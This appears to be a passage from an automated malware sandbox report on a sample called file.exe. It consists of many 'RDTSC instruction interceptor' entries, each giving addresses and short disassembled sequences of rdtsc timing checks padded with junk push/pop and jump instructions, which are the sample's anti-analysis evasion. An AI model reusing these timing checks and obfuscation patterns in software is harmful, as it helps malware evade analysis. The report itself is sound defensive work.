                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 968EDE second address: 968EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9691F3 second address: 969211 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F228CBCA0AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push edx 0x0000000b push ecx 0x0000000c je 00007F228CBCA0A6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96ED26 second address: 96ED2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96ED2E second address: 96ED34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96ED34 second address: 96ED39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96DCE5 second address: 96DCEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96DCEA second address: 96DCF4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F228D5156CEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96DE63 second address: 96DE69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96DFE1 second address: 96DFE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96DFE5 second address: 96DFE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96E130 second address: 96E136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96E136 second address: 96E14B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F228CBCA0A6h 0x0000000a popad 0x0000000b jmp 00007F228CBCA0AAh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96E14B second address: 96E156 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F228D5156C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96E156 second address: 96E15C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96E15C second address: 96E162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96E290 second address: 96E296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96E407 second address: 96E416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96E416 second address: 96E420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F228CBCA0A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96E420 second address: 96E424 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96D5EC second address: 96D5F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96D5F0 second address: 96D604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F228D5156CEh 0x0000000c pushad 0x0000000d popad 0x0000000e jg 00007F228D5156C6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96D604 second address: 96D618 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jns 00007F228CBCA0A6h 0x0000000b popad 0x0000000c jne 00007F228CBCA0ACh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 974275 second address: 97427A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97AD78 second address: 97AD7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97AD7C second address: 97AD80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97E3D6 second address: 97E3DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97E3DA second address: 97E3E0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97E3E0 second address: 97E3EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97E3EC second address: 97E3F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97E3F0 second address: 97E3F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97DD27 second address: 97DD48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F228D5156D5h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97E09B second address: 97E09F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97E09F second address: 97E0BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F228D5156D5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986613 second address: 98661B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98661B second address: 986623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986623 second address: 986675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F228CBCA0B7h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jp 00007F228CBCA0A6h 0x00000014 jmp 00007F228CBCA0B9h 0x00000019 push eax 0x0000001a pop eax 0x0000001b push eax 0x0000001c pop eax 0x0000001d popad 0x0000001e jmp 00007F228CBCA0AEh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986675 second address: 98669E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F228D5156D9h 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F228D5156C6h 0x0000000f jp 00007F228D5156C6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9850AF second address: 9850CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F228CBCA0B7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9850CB second address: 985100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F228D5156D7h 0x00000009 jmp 00007F228D5156D5h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 985100 second address: 985104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 985104 second address: 985108 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 985678 second address: 98567C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98567C second address: 9856B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F228D5156D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F228D5156D8h 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9856B2 second address: 9856B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9857E7 second address: 9857EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 985974 second address: 98597A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98597A second address: 985984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98958A second address: 989592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9892F4 second address: 9892F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98CA5D second address: 98CA62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98CA62 second address: 98CA6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnp 00007F228D5156C6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98CA6E second address: 98CA72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98CA72 second address: 98CA85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F228D5156C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98CA85 second address: 98CA89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98CA89 second address: 98CA8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98CA8D second address: 98CA96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98CBEF second address: 98CBF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98CBF3 second address: 98CBFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F228CBCA0A6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 995958 second address: 99597F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F228D5156D5h 0x0000000d popad 0x0000000e pushad 0x0000000f jnp 00007F228D5156C6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99597F second address: 995991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a js 00007F228CBCA0A6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993ABA second address: 993ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993C38 second address: 993C3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993C3E second address: 993C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993C47 second address: 993C54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993C54 second address: 993C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993F25 second address: 993F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 994A86 second address: 994A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 994A8B second address: 994A97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jo 00007F228CBCA0A6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99B00E second address: 99B037 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F228D5156CEh 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 jmp 00007F228D5156CEh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EFAE second address: 99EFB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99E152 second address: 99E156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EC71 second address: 99EC7B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F228CBCA0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EC7B second address: 99EC83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5EA8 second address: 9A5EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5EAD second address: 9A5EB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5EB2 second address: 9A5ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F228CBCA0A6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F228CBCA0B4h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A603F second address: 9A6043 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A6043 second address: 9A6049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A646A second address: 9A646E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A65AB second address: 9A65B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A65B2 second address: 9A65D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F228D5156D5h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A6B35 second address: 9A6B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A6B3E second address: 9A6B47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A6C39 second address: 9A6C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A6C42 second address: 9A6C49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A6C49 second address: 9A6C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F228CBCA0A6h 0x0000000a popad 0x0000000b jp 00007F228CBCA0AEh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jl 00007F228CBCA0BAh 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5A13 second address: 9A5A34 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F228D5156D3h 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F228D5156C6h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AAB4F second address: 9AAB57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EEB57 second address: 8EEB67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F228D5156C6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EEB67 second address: 8EEBA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F228CBCA0B2h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F228CBCA0AFh 0x00000013 push ebx 0x00000014 jmp 00007F228CBCA0B6h 0x00000019 pop ebx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AF7C7 second address: 9AF7E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F228D5156D4h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AF4B1 second address: 9AF4BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F228CBCA0A6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AF4BE second address: 9AF4C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AF4C4 second address: 9AF4CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F228CBCA0A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B53D4 second address: 9B53FD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F228D5156DDh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B53FD second address: 9B5403 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5403 second address: 9B5409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF28E second address: 9BF296 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF3C2 second address: 9BF3CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C1999 second address: 9C19A9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F228CBCA0B2h 0x00000008 jl 00007F228CBCA0A6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C4600 second address: 9C4606 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C4606 second address: 9C4613 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F228CBCA0A8h 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3058 second address: 9D3065 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edi 0x00000006 pop edi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA29E second address: 9DA2A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F228CBCA0A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA2A8 second address: 9DA2B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F228D5156CAh 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
